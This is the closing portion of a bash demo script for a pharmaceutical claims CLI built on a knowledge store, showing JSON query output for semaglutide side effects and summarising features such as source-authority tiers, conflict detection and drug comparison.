|
||||
|
||||
echo -e "\n${YELLOW}Note:${NC} Efficacy predicates use Drug:Indication subjects."
|
||||
echo -e "Safety predicates use Drug-only subjects (apply across indications)."
|
||||
wait_for_user
|
||||
|
||||
# ============================================================================
|
||||
# STEP 6: JSON Output (for Integration)
|
||||
# ============================================================================
|
||||
print_header "Step 6: JSON Output (for Integration)"
|
||||
|
||||
echo -e "${BOLD}Use Case:${NC} Programmatic access for AI agents or web apps"
|
||||
echo -e "${BOLD}Format:${NC} JSON output for parsing\n"
|
||||
|
||||
print_step "Getting JSON response..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" --format json query "Semaglutide" "nausea_rate" | head -50
|
||||
|
||||
echo -e "\n... (truncated for demo)"
|
||||
wait_for_user
|
||||
|
||||
# ============================================================================
|
||||
# Summary
|
||||
# ============================================================================
|
||||
print_header "Demo Summary"
|
||||
|
||||
echo -e "${GREEN}${BOLD}What We Demonstrated:${NC}\n"
|
||||
|
||||
echo -e " 1. ${CYAN}Data Ingestion${NC}"
|
||||
echo -e " - FDA label extraction (Regulatory tier)"
|
||||
echo -e " - Mock social media conflicts (Anecdotal tier)"
|
||||
echo ""
|
||||
|
||||
echo -e " 2. ${CYAN}Conflict Detection${NC}"
|
||||
echo -e " - Skeptic lens shows ALL claims"
|
||||
echo -e " - Conflict score quantifies disagreement"
|
||||
echo ""
|
||||
|
||||
echo -e " 3. ${CYAN}Source Hierarchy${NC}"
|
||||
echo -e " - LayeredConsensus groups by authority tier"
|
||||
echo -e " - FDA data weighted higher than Reddit"
|
||||
echo ""
|
||||
|
||||
echo -e " 4. ${CYAN}Drug Comparison${NC}"
|
||||
echo -e " - Side-by-side view of multiple subjects"
|
||||
echo -e " - Each drug's claims with provenance"
|
||||
echo ""
|
||||
|
||||
echo -e " 5. ${CYAN}Data Exploration${NC}"
|
||||
echo -e " - Discover available predicates"
|
||||
echo -e " - Different subject patterns for efficacy vs safety"
|
||||
echo ""
|
||||
|
||||
echo -e " 6. ${CYAN}API Integration${NC}"
|
||||
echo -e " - JSON output for programmatic access"
|
||||
echo -e " - Ready for AI agents and web apps"
|
||||
echo ""
|
||||
|
||||
echo -e "${BOLD}Consumer Health Value Proposition:${NC}"
|
||||
echo -e " - ${GREEN}See all perspectives${NC}, not just the loudest"
|
||||
echo -e " - ${GREEN}Understand source authority${NC} (FDA vs. Reddit)"
|
||||
echo -e " - ${GREEN}Make informed decisions${NC} with conflict awareness"
|
||||
echo ""
|
||||
|
||||
echo -e "${BOLD}Next Steps:${NC}"
|
||||
echo -e " - Run Consumer Health UAT: ${CYAN}cargo test -p stemedb-ontology --test consumer_health_uat${NC}"
|
||||
echo -e " - Read the guide: ${CYAN}docs/app-concepts/consumer-health.md${NC}"
|
||||
echo -e " - Try the Go SDK: ${CYAN}sdk/go/steme/${NC}"
|
||||
echo ""
|
||||
|
||||
print_success "Demo complete!"
|
||||
Loading…
Reference in New Issue
Block a user